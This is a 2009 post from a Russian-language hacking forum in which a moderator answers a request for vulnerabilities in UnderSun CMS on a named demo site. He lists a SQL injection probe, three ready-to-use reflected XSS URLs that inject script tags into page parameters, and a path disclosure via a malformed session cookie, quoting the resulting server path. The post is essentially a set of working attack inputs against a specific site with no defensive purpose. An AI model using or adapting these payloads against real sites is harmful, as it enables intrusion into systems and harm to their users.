07.07.2009, 23:36
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от moinick
Нужны любые баги, уязвимости..
demo.undersky.ru
demo.undersky.ru/admin/
http://demo.undersky.ru/rss.php?mode=1'&doc=5
Кто еще что подкинет?
Это просто пример, на этом движке
UnderSun CMS называется..
И так в GET запросе Mode
Ты поставил ', SQL иньекция это не ошибка, это выполнение произвольных команд. Запомни.
http://demo.undersky.ru/sites.html?p=2%22%3E%3Cscript%3Ealert();%3C/script%3E
http://demo.undersky.ru/forget_passw.html?answ=14%22%3E%3Cscript%3Ealert() ;%3C/script%3E
http://demo.undersky.ru/news.html?id=3%22%3E%3Cscript%3Ealert();%3C/script%3E
Кароч там всё с XSS
Раскрытие путей
В куках
Итог
Warning: session_start() [function.session-start]: The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in /usr/home/undersun/domains/demo.undersky.ru/public_html/index.php on line 7
Кароч сайтег дырявенький
|
|
|